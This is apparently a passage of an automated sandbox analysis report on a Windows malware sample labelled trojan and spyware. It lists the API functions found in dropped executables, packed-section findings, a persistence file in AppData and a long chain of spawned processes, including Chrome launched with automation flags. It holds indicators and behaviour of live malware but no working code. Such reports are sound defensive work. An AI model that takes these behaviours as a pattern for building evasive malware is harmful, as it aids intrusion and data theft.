Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589670 ZwQueryInformationProcess,		29_2_6B589670
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,		29_2_6B57BE62
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B613E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,		29_2_6B613E22
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B582E1C RtlInitializeCriticalSectionEx,ZwDelayExecution,		29_2_6B582E1C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B5D2E14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,		29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B5FFE3F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B630 ZwWaitForKeyedEvent,		29_2_6B54B630
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589E30 ZwCancelWaitCompletionPacket,		29_2_6B589E30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589E20 ZwCancelTimer2,		29_2_6B589E20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5466D4 RtlInitUnicodeString,ZwQueryValueKey,		29_2_6B5466D4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B579ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,		29_2_6B579ED0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5896D0 ZwCreateKey,		29_2_6B5896D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,		29_2_6B542ED8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5896C0 ZwSetInformationProcess,		29_2_6B5896C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,		29_2_6B54B6F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,		29_2_6B5D16FA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B59DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,		29_2_6B59DEF0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5576FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,		29_2_6B5576FE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56E6F9 ZwAlpcSetInformation,		29_2_6B56E6F9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618ED6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5896E0 ZwFreeVirtualMemory,		29_2_6B5896E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,		29_2_6B5FBE9B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,		29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542E9F ZwCreateEvent,ZwClose,		29_2_6B542E9F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B543E80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B613EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,		29_2_6B613EBC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,		29_2_6B56E6B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B5D2EA3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B606D61 ZwAllocateVirtualMemoryEx,		29_2_6B606D61
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1D43 ZwQueryInformationThread,		29_2_6B5D1D43
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589D70 ZwAlpcQueryInformation,		29_2_6B589D70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,		29_2_6B5D1570
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B611D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,		29_2_6B611D55
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1D6A ZwWaitForMultipleObjects,		29_2_6B5D1D6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618D34
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1D0B ZwSetInformationProcess,		29_2_6B5D1D0B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,		29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589520 ZwWaitForSingleObject,		29_2_6B589520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FFD22 ZwQueryInformationProcess,RtlUniform,		29_2_6B5FFD22
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5445D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,		29_2_6B5445D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5895D0 ZwClose,		29_2_6B5895D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B5FFDD3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56EDC4 ZwCancelWaitCompletionPacket,		29_2_6B56EDC4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,		29_2_6B544DC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5895C0 ZwSetEvent,		29_2_6B5895C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5495F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,		29_2_6B5495F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,		29_2_6B5FBDFA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5895F0 ZwQueryInformationFile,		29_2_6B5895F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589DE0 ZwAssociateWaitCompletionPacket,		29_2_6B589DE0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543591 ZwSetInformationFile,		29_2_6B543591
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,		29_2_6B55DD80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601582 ZwTraceEvent,		29_2_6B601582
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5895B0 ZwSetInformationThread,		29_2_6B5895B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589DB0 ZwAlpcSetInformation,		29_2_6B589DB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5465A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,		29_2_6B5465A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589DA0 ZwAlpcSendWaitReceivePort,		29_2_6B589DA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,		29_2_6B545450
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1C49 ZwQueryInformationProcess,		29_2_6B5D1C49
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618C75
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589C40 ZwAllocateVirtualMemoryEx,		29_2_6B589C40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589C70 ZwAlpcConnectPort,		29_2_6B589C70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B585C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,		29_2_6B585C70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1C76 ZwQueryInformationProcess,		29_2_6B5D1C76
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,		29_2_6B56746D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,		29_2_6B5F3C60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B580413 ZwUnmapViewOfSection,		29_2_6B580413
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56FC39 ZwAssociateWaitCompletionPacket,		29_2_6B56FC39
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601411 ZwTraceEvent,		29_2_6B601411
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618C14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A420 ZwGetNlsSectionPtr,		29_2_6B58A420
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542CDB RtlFreeHeap,ZwClose,ZwSetEvent,		29_2_6B542CDB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,		29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6014FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B6014FB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,		29_2_6B5F64FB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B618CD6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,		29_2_6B54F4E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D1CE4 ZwQueryInformationProcess,		29_2_6B5D1CE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B614CAB ZwTraceControl,		29_2_6B614CAB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,		29_2_6B5C3C93
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B619CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,		29_2_6B619CB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58A480 ZwInitializeNlsFiles,		29_2_6B58A480
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,		29_2_6B604496

PE file does not import any functions

Source: F1AC.exe.10.dr

Static PE information: No import functions for PE file found

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: C066.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C8FE.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: DEDC.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: E64F.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C295.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B096.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CAC5.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CBF0.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CD17.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FD36.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

PE file has an executable .text section and no other executable section

Source: Md0q201V1D.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Creates files inside the user directory

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\gbhudtb

Jump to behavior

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Source: 1105.tmp.29.dr

Binary string: \Device\IPT

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@74/167@62/20

Found detection on Joe Sandbox Cloud Basic with higher score

Source: Md0q201V1D.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Reads software policies

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Users\user\AppData\Local\Temp\21.exe	Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: unknown	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EBBE.exe C:\Users\user\AppData\Local\Temp\EBBE.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C066.exe C:\Users\user\AppData\Local\Temp\C066.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bhhudtb C:\Users\user\AppData\Roaming\bhhudtb
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
